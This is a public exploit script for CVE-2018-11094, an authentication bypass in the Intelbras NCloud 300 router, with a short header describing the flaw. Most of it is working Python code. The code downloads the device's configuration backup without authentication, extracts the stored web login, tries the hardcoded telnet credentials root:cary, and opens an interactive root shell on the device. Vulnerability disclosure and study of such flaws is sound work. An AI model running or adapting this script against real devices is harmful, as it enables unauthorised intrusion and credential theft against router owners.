# coding: utf-8 # Exploit Title: Intelbras NCloud Authentication bypass # Date: 16/05/2018 # Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com # Vendor Homepage: http://www.intelbras.com.br/ # Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud # Version: 1.0 # Tested on: Linux # CVE : CVE-2018-11094 # Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly # enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh'). # The configurations backup file contains the web interface username and password. # Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, # it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials # to log into the device using telnet. import sys import requests import telnetlib import re def help(): print 'Usage: ' print 'python exploit.py' def pop_shell(host, user, password): if(user == "root"): print '[+] Trying default credentials: root:cary' else: print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh' with open('NCLOUD_config.dat', "r") as f: content = f.read() user = content.split("Login=")[1].split("\n")[0] password = content.split("Password=")[1].split("\n")[0] #print 'User: '+ user #print 'Password: '+ password f.close() try: ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0] tn = telnetlib.Telnet(ip, 23, timeout=10) tn.expect(["WORKGROUP login:"], 5) tn.write(user + "\r\n") tn.expect(["Password:"], 5) tn.write(password + "\r\n") i = tn.expect(["Login incorrect"], 5) if i[0] != -1: raise ValueError('[-] Wrong credential') tn.write("cat /proc/cpuinfo\r\n") tn.interact() tn.close() except Exception as e: print e if(user == "root"): pop_shell(host, 'try', 'again') def exploit(host): print '[*] Connecting to %s' %host path = '/cgi-bin/ExportSettings.sh' payload = 'Export=Salvar' response = requests.post(host + path, data=payload) response.raise_for_status() if(response.status_code == 200 and "Login=" in response.text): print '[+] Config download was successful' print '[+] Saving backup file to NCLOUD_config.dat' with open('NCLOUD_config.dat', "w") as f: f.write(response.text) f.close() pop_shell(host, "root", "cary") def main(): if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'): help() return host = sys.argv[1] exploit(host) if __name__ == '__main__': main()